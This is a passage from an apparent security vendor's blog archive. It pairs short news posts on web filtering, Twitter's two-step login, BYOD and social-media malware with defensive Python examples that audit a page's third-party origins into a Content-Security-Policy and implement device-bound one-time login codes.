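    c = _SrcCollector()
    c.feed(html)
    return {
        "scripts": sorted({origin_of(u, page_origin) for u in c.scripts}),
        "frames": sorted({origin_of(u, page_origin) for u in c.frames}),
        "inline_scripts": c.inline,
    }


def audit(html, page_origin, approved):
    """Flag third-party origins that are not approved and build a CSP that
    permits only the approved ones. object-src 'none' additionally blocks
    plugin content such as Java applets, the vector the Yahoo adverts probed for."""
    inv = inventory(html, page_origin)
    third_party = {o for o in inv["scripts"] + inv["frames"] if o != page_origin}
    allowed = " ".join(["'self'"] + sorted(approved))
    csp = f"script-src {allowed}; frame-src {allowed}; object-src 'none'"
    return {
        "unapproved": sorted(third_party - set(approved)),
        "inline_scripts": inv["inline_scripts"],
        "csp": csp,
    }


# Constructed sample page: one first-party script, one inline block, an approved
# ad tag, an unapproved CDN script, and a third-party tracking frame.
SAMPLE_PAGE = """<html><head>
<script src="/js/site.js"></script>
<script>var cfg = {};</script>
<script src="https://ads.example-network.net/tag.js"></script>
<script src="//cdn.example-cdn.com/lib.js"></script>
</head><body>
<iframe src="https://tracker.example-analytics.org/pixel"></iframe>
</body></html>"""

PAGE_ORIGIN = "https://www.example.com"          # constructed
APPROVED = {"https://ads.example-network.net"}   # constructed allowlist

if __name__ == "__main__":
    result = audit(SAMPLE_PAGE, PAGE_ORIGIN, APPROVED)
    for origin in result["unapproved"]:
        print("unapproved third-party origin:", origin)
    print("inline scripts:", result["inline_scripts"])
    print("Content-Security-Policy:", result["csp"])
```

The emitted policy stops an approved ad script from pulling in further loaders from origins that are not listed, and object-src 'none' keeps plugin content such as Java applets out of the page altogether. It does not protect against malicious content served from the approved origin itself, which is why vetting the network still matters.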
by G Hunt |
December 17, 2013 |
Internet Security News
In September, WebTitan launched a competition offering charities the chance to win a free WebTitan Cloud Security Solution to keep their networks protected when workers access the Internet and email. The solution is highly effective at preventing users from inadvertently accessing web content that could infect networks or computers with malware, while shielding users from objectionable content. It also lets an organization see which websites individual workers are attempting to access. For charitable organizations the WebTitan Cloud Security Solution offers exceptional protection and can prevent data breaches and costly cyberattacks. The competition attracted a great many entries. All that was required to enter was for the participant to be a charity and provide a brief answer to a very simple question: why would the organization benefit from winning a free WebTitan Cloud Security Solution?

The WebTitan Cloud Competition Winner Is… Touch Life of Uganda

The first prize in the competition was well worth winning: a WebTitan Cloud web security license valued at $8,000! The prize could not have gone to a worthier winner. Touch Life is a Non-Governmental Organization (NGO) operating in Uganda. The charity performs important and incredibly valuable work, assisting families that have been torn apart by war, famine and disease and forced into extreme poverty. It empowers those families to take control of their lives and gives them hope. In an ideal world, the websites of charities would be exempt from cyberattacks. Sadly, they are no different from the websites of global corporations earning profits in the billions. Cybercriminals often run indiscriminate campaigns, and the reality is that charities are frequently targeted simply for having poor security controls. If there is money to be made from attacking a website, that website will be attacked.
In fact, cybercriminals often take advantage of natural disasters, famine, and war to obtain donations intended to help victims. However, the Internet is vital for charities to spread news about the excellent work they perform and attract donations. Without those donations they...
by G Hunt |
April 24, 2013 |
Internet Security News
Twitter has suffered two major security breaches that exposed the login credentials of hundreds of thousands of its users. In response, a number of additional security controls were considered, and the best option was judged to be a two-step authentication process. This will not prevent another breach of Twitter's credential store, but it means a stolen password alone is no longer enough to gain access to an account, which makes life a lot harder for hackers. The new controls are likely to deter all but the most skilled and determined cybercriminals from attacking Twitter in the future; there will be much easier targets. Two-step authentication is an important security control. The first step is the one every user already knows: sign up and create a login name and password. The second step, which Twitter will shortly add, is a one-time code sent to the email address, mobile phone, or Twitter app registered to the account. The additional control also records the user's device. If a login is attempted from a different device, another code is sent to the registered app, phone, or email account, and unless that code is entered, access is refused. Wired.com has recently reported that Twitter is testing the new security measure before making it live. Once testing is complete it will be rolled out to all accounts. This will not come a moment too soon. Cybercriminals are targeting social media networks, and where security measures are inadequate, data breaches will follow.

Social Media Networks are an Attractive Target for Cybercriminals

The networks are a big target for hackers and cybercriminals. The data stored in user accounts can be considerable, and it can be used to conduct highly effective spear phishing campaigns. With detailed information about each user, those campaigns can be very convincing: criminals can use stolen data to craft emails that the user is likely to respond to.
They can find out who their contacts are, and make an email appear that it has been sent by a friend. That makes it far more likely that the target will click a phishing link or open an infected attachment. Not...
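The two-step flow described in the Twitter item above, written out as an added example. This is not Twitter's implementation, whose internals the article does not describe; it models the steps the text names: a password check, a one-time code delivered out of band unless the device has already been verified, and a record of verified devices so that a new device triggers a fresh code. Assumptions made for the example: the device token is a random value the site set in a cookie when the device was first verified, delivery happens through a callback standing in for email, SMS or an app notification, codes expire after CODE_TTL seconds, and a pending code is discarded after MAX_ATTEMPTS wrong guesses.

```python
"""Two-step login with a remembered device.

Added example, not Twitter's code. It models the flow the article describes:
a password check, then a one-time code delivered out of band unless the
device has already been verified, and a record of verified devices so a new
device triggers a fresh code. Assumed for the example: the device token is a
random value the site set in a cookie at first verification, delivery is a
callback (email, SMS or app push in practice), codes expire after CODE_TTL
seconds and are discarded after MAX_ATTEMPTS wrong guesses.
"""
import hashlib
import hmac
import secrets
import time

CODE_TTL = 300          # seconds a one-time code stays valid (assumed)
MAX_ATTEMPTS = 3        # wrong guesses before the pending code is discarded (assumed)
PBKDF2_ROUNDS = 100_000


class Account:
    def __init__(self, username, password):
        self.username = username
        self.salt = secrets.token_bytes(16)
        self.pw_hash = self._derive(password)
        self.trusted_devices = set()   # tokens of devices that completed step two
        self.pending = None            # state of an in-progress second step

    def _derive(self, password):
        return hashlib.pbkdf2_hmac("sha256", password.encode(), self.salt, PBKDF2_ROUNDS)

    def check_password(self, password):
        # Constant-time comparison so timing does not leak how much matched.
        return hmac.compare_digest(self._derive(password), self.pw_hash)


def start_login(account, password, device_token, send_code, now=time.time):
    """Step one. Returns 'denied', 'ok' (device already verified) or 'code_required'."""
    if not account.check_password(password):
        return "denied"
    if device_token in account.trusted_devices:
        return "ok"
    code = f"{secrets.randbelow(10 ** 6):06d}"     # six-digit one-time code
    account.pending = {
        "code": code,
        "device": device_token,                   # code is bound to the requesting device
        "expires": now() + CODE_TTL,
        "attempts": MAX_ATTEMPTS,
    }
    send_code(account.username, code)             # out-of-band delivery: email, SMS or app
    return "code_required"


def finish_login(account, device_token, submitted_code, now=time.time):
    """Step two. Returns 'ok', 'denied', 'expired' or 'locked'."""
    p = account.pending
    if p is None or p["device"] != device_token:
        return "denied"                           # no code outstanding for this device
    if now() > p["expires"]:
        account.pending = None
        return "expired"
    p["attempts"] -= 1
    if hmac.compare_digest(p["code"].encode(), str(submitted_code).encode()):
        account.pending = None
        account.trusted_devices.add(device_token)  # remember this device
        return "ok"
    if p["attempts"] <= 0:
        account.pending = None                    # burn the code; the attacker must restart
        return "locked"
    return "denied"


def new_device_token():
    """Random value the site would set in a cookie on the device being verified."""
    return secrets.token_urlsafe(32)


if __name__ == "__main__":
    outbox = []
    deliver = lambda user, code: outbox.append(code)   # stands in for email/SMS/app
    acct = Account("alice", "correct horse battery staple")
    laptop = new_device_token()
    print(start_login(acct, "correct horse battery staple", laptop, deliver))   # code_required
    print(finish_login(acct, laptop, outbox[-1]))                               # ok
    print(start_login(acct, "correct horse battery staple", laptop, deliver))   # ok, remembered
    print(start_login(acct, "correct horse battery staple", new_device_token(), deliver))  # code_required
```

The code is bound to the device that requested it, expires, and is discarded after a few wrong guesses, so a leaked password gets an attacker only as far as a prompt they cannot answer. The trusted-device set is what the article calls logging the user's device; an attacker who steals that cookie too has both factors, which is why the cookie must be as well protected as a session cookie.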
by G Hunt |
February 20, 2013 |
Internet Security News
Bring Your Own Device (BYOD) is increasing in popularity. Employers love it: they can leverage the power of smartphones, tablets and laptops without paying the huge cost of supplying devices to every staff member. BYOD can bring a major increase in productivity, improve efficiency, and facilitate better collaboration; the devices make communication so much easier. That said, they raise a number of security concerns, so much so that many security experts believe the acronym should stand for "Bring Your Own Doom" or "Breach Your Own Data." By running such a scheme are you simply introducing unnecessary data security risks? Would it be better to bite the bullet and supply mobile devices in order to exercise greater control?

Employees are not necessarily careful with corporate data stored on their devices

Employees engage in risky online behavior. They fail to implement even basic security controls on their own devices and are prone to losing them. If those devices are used to store corporate data, this is a major security risk. Even with the risks posed by allowing the devices to be used at work, a Fortinet survey recently revealed that 74% of organizations in the United States have adopted BYOD. The survey covered 3,800 employees, half of whom believed that bringing their own devices to work was a basic human right. In actual fact it is a privilege. The figures would be surprising were it not for the fact that all of the respondents were in their early twenties, many having only just started their first job. Young adults, often referred to as Generation Y, are tech-savvy and have grown up with a myriad of electronic devices at their disposal. They are heavily reliant on this technology. That is good news in that they can use a wide range of devices competently; they know their way around a computer and are easy to train.
On the downside they are perhaps too reliant on their mobile devices and use them too much to communicate. Take those devices away and they are at a loss. Employers have realized that this technical expertise can be leveraged to improve efficiency in the workplace. They are also the CEOs, CISOs and...
by G Hunt |
December 12, 2012 |
Internet Security News
It is now possible to search the Internet more securely, and avoid objectionable content, without installing a web filtering solution or parental controls. Google has added greater protection to its search engine to filter out undesirable webpages. Users of Google.com no longer have the option of choosing a moderate level of filtering; the choice is now yes or no. They can "filter explicit content" or not, and account holders can also lock the setting in place. This will undoubtedly please many parents, who can easily add a filter to prevent their children from being shown adult content, but not everyone is happy. The news broke via Reddit, and many Internet users have reacted angrily over what they see as censorship of their searches by Google SafeSearch.

Google SafeSearch is not sufficient protection for businesses, schools and colleges

The major search engines are well aware that a lot of websites contain adult or otherwise explicit content, and most now offer an option to filter search results so that certain sites are not displayed. In their various safe modes they limit the results returned for general search terms. This is fine for home use, but it is not sufficient protection for schools, colleges and businesses. The function can be used, of course, but it must be set on each individual computer or browser, and the controls are easy to get around. They only prevent content from inadvertently appearing in search results. If a student or member of staff wants to access explicit content, it is easy to bypass the controls or turn them off. These filters are also often over-aggressive and block some legitimate websites: it may not be possible for students or teachers to view classic literature or works of art, as some of it will be deemed sexually explicit.
The answer in this case is not to use the search engine functions to filter content, but to employ a powerful web filtering solution such as WebTitan. WebTitan allows a system administrator to fine tune the web filter to ensure that adult and other objectionable content...
by G Hunt |
October 31, 2012 |
Internet Security News
On November 1, 2012, SpamTitan Technologies will release WebTitan 4.0, the latest version of its web filtering solution for business customers. The new version includes a host of additional features to make it easier than ever for system administrators to manage Internet usage in the workplace and protect their networks from malware, viruses and cyberattacks. It adds new controls to manage bandwidth, advanced reporting features, delegated administration, full transparent authentication, and SNMP support. WebTitan 4.0 also boasts improved white labeling options.

Proxy mode now offers full transparent authentication

When developing WebTitan 4.0, the product team took on board comments from users and incorporated a host of new features to make management easier. The result is the most user-friendly version released to date, with augmented controls to ensure businesses are better protected. WebTitan 4.0 offers full transparent authentication when the product is used in proxy mode, so reports can be generated per user; in previous versions, reporting for transparent proxies was IP-based.

Administration functions can be easily configured

New delegated administration functionality reduces the burden on system administrators. Administration of WebTitan can now be handed to any stakeholder in the organization. All controls are easily configured: individual users can be granted reporting rights or policy management privileges, and reporting rights can be scoped so that an individual can issue Internet usage reports only for specific users or user groups.
Once administrator rights have been configured, reporting and policy management responsibilities can be delegated to the individuals who best understand which web filtering policies suit specific groups of users, ensuring much improved cross-organizational participation.

Ensure enough bandwidth is available for business-critical applications

The latest version offers a host of improved corporate Internet policy functions to ensure that sufficient bandwidth...
by G Hunt |
October 15, 2012 |
Internet Security News
A recent survey conducted by SpamTitan Technologies indicates that the vast majority of companies are prepared to terminate the contracts of employees for inappropriate social media use, such as exposing confidential data on social media networks. The corporate social media usage study showed that 87% of respondents would consider firing an employee for inappropriate social media use that violated company policies.

Only 16% of companies think social media use at work is acceptable

The use of social media channels during work time is frowned upon by most companies. Many turn a blind eye to a little social media time during the working day, but only 16% of the organizations taking part in the study said they actually consider it acceptable for staff to spend some time on Facebook, Twitter, LinkedIn and other social media networks. The threat of termination for misuse of social media, in particular the posting of confidential information or disparaging remarks about an employer, is not an empty one. According to a study conducted by Osterman Research, one company in six has already terminated at least one employee's contract for inappropriate use of social media in the workplace. With the rise in popularity of websites such as Facebook, Twitter and LinkedIn, it is understandable that staff with Internet access are tempted to spend a little of their working day checking their accounts. For many employers the main issue is not the loss of productivity that results from inappropriate social media use; it is the security threat that such use introduces.

Malware is rife on Facebook

Social media websites are a magnet for cybercriminals, and malware is rife on them. Online criminals trawl Facebook, Twitter and LinkedIn looking for corporate data, while phishers seek information that can be used to conduct spear phishing campaigns.
Twitter now has 145 million active users and Facebook has 845 million users around the world. Many of these users are accessing their accounts during working hours too. Osterman discovered that 36% of employees use part of their working day to check...
by G Hunt |
February 21, 2012 |
Internet Security News
A new study published by Osterman Research indicates that there are major Facebook malware risks of which many companies are not aware, and those risks are very real: 24% of companies have discovered malware affecting their corporate Facebook pages. The risk of malware affecting corporate social media pages is considerable, with Facebook the social media network most attacked by criminal gangs. LinkedIn and Twitter can also be risky, but only 7% of companies have had their Twitter and LinkedIn accounts affected. The problem could actually be far worse: the study revealed that many IT security professionals did not even know whether their social media accounts had been hacked or infected with malware, because they never check.

Employees' social media use during working hours has increased significantly

Researchers at Osterman found that the use of social media sites by employees during working hours had increased significantly over the past year. The survey results revealed that 36% of corporate employees were accessing their Facebook accounts during office hours, up from 28% last year. Use of Twitter during working hours is also increasing: last year 11% of employees used Twitter at work, this year 17%. The same is true of LinkedIn, with employee use rising from 22% to 29% over the same period.

Employees are a major risk to corporate network security

It is clear that social media accounts are being targeted by hackers and cybercriminals, and as the sites grow in popularity the problem is only likely to get worse. When employees access social media sites at work they could be placing corporate networks at risk, and as more employees use those sites during working hours, and spend more time on them, the risk to data security increases.
Personal information is being shared on the sites, but some employees are also sharing corporate information. Sometimes this is deliberate; other times potentially sensitive data is unwittingly shared.

Criminals trawl social media websites looking for information to launch spear phishing campaigns

A...
by G Hunt |
August 15, 2011 |
Internet Security News
There was a buying frenzy following the release of the new .xxx domains. Pornographers, Internet marketers and entrepreneurs competed to secure the hottest and rudest of them. Now that the first .xxx websites have gone live, there has been further talk of compartmentalizing the Internet, with the possibility of all pornographic websites being confined to the .xxx suffix. But will the .xxx domains make web filtering pornography any easier?

ICANN releases .xxx domains for sale

The Internet Corporation for Assigned Names and Numbers, better known as ICANN, created the new top-level domain specifically for websites of an adult nature. The long-term view was to eventually move all pornographic websites to .xxx domains. This could clean up the Internet and make it much easier for parents and businesses to block pornographic websites: it is, after all, much easier to block a single top-level domain than to implement web filtering that recognizes every website containing pornographic material. IT security professionals, and individuals who want to keep porn off their computers, phones and tablets, could then simply block the .xxx extension. There is a problem, of course. Owners of adult websites have been buying up new domain names in their thousands, but will they redirect their current .com, .co.uk, .org and .net sites to the new .xxx domains? Of course they won't. They have just been given even more domain names to fill with pornography, and any redirects are likely to run from the .xxx names back to their main, well-established websites. Unless laws are introduced to force purveyors of adult content onto the new domains, the online adult entertainment industry simply will not make the switch. Some firms will undoubtedly activate their new .xxx websites, but unless everyone does, the initiative will be seen to have failed and web filtering pornography will be no easier.
Will the .xxx domains make web filtering pornography any easier?

Potentially, the creation of the new domain will make it easier to filter some adult sites, so it will make the job of web filtering a little easier....